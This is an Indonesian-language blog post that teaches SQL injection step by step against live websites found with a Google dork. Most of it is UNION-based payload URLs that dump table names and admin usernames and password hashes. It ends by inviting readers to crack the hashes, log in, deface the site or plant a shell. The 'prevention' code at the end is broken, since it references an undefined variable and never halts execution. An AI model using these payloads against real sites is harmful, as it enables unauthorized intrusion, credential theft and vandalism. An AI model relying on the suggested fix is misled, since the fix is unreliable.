Jangan biarkan orang lain mengetahui dirimu

Cari...

Powered by Blogger.

Popular Posts

Monday, April 23, 2018

SQL Injection, apa tuh???


Judulnya terkesan nanya gitu, tapi okelah. Kali ini saya akan membagikan ilmu tentang teknik SQL Injection atau sering disingkat SQLi.

Mungkin udah banyak yang bikikn tutorial ini, tapi gapapa lah. Namanya juga ilmu, harus disebarkan ya?? Setuju???



Untuk itu, mari kita mulai!!
Kondisi:
1. PC
2. Browser
3. Dork: inurl:index.php?id= (kembangin lagi ya..)

1. Cari targetnya pake dork tadi
2. Kalau udah ketemu targetnya tambahkan kutip tunggal di belakang angka, contoh:
http://www.target.com/index.php?id=45'
3. Kalau muncul error, lanjut
4. Kita tebak tabel di database website pake order by 1--, contoh:
 http://www.target.com/index.php?id=-45+order+by+1--
lanjut terus:
http://www.target.com/index.php?id=-45+order+by+2--
http://www.target.com/index.php?id=-45+order+by+3--
http://www.target.com/index.php?id=-45+order+by+4--
http://www.target.com/index.php?id=-45+order+by+5--
http://www.target.com/index.php?id=-45+order+by+6--
5. Kalau angka 6 muncul error, kita lanjutin dengan munculin angka "togel" :D
http://www.target.com/index.php?id=-45+union+all+select+1,2,3,4,5--
Misal yang muncul angka 3 dan 4, pilih salah satu nomor, kita pilih 3
6. Setelah muncul angkanya kita lihat versi databasenya
http://www.target.com/index.php?id=-45+union+all+select+1,2,@@version,4,5--
kalau versi 5.x.x kita beruntung, tapi kalau versi 4.x.x cari target lain aja soalnya kita harus nebak tabelnya.
7. Kita intip nama nama tabelnya pake perintah group_concat(table_name) dan from+information_schema.tables+where+table_schema=database()--
http://www.target.com/index.php?id=-45+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tables+where+table_schema=database()--
8. Nama nama tabel akan muncul, kita pilih tabel admin atau users dengan cara merubah nama tabel tersebut menjadi angka hex misal admin = 61646d696e
http://www.target.com/index.php?id=-45+union+all+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name=0x61646d696e--
9. Kita lihat isi kolom nya dengan perintah:
http://www.target.com/index.php?id=-45+union+all+select+1,2,group_concat(username,0x3a,password,0x3a),4,5+from+admin--
10. Muncul username dan password yang berbentuk md5, silakan crack sendiri :P
11. Login, dan silakan deface atau tanam shell atau apalah :P

Untuk pencegahan SQLi tambahkan kode berikut di script yang bermasalah tadi:
 1. if(!preg_match("/^[0-9]+$/", $id)){ echo "Ih ada hekel, takuuut"; }
 2. if($id < 0){ echo "Ih ada hekel, takuuut"; }
 3. if(strlen($idt)>5){ echo "Ih ada hekel, takuuut"; }

Sekian tutorial ini, semoga bermanfaat. Ciao!

0 Tanggapan:

Post a Comment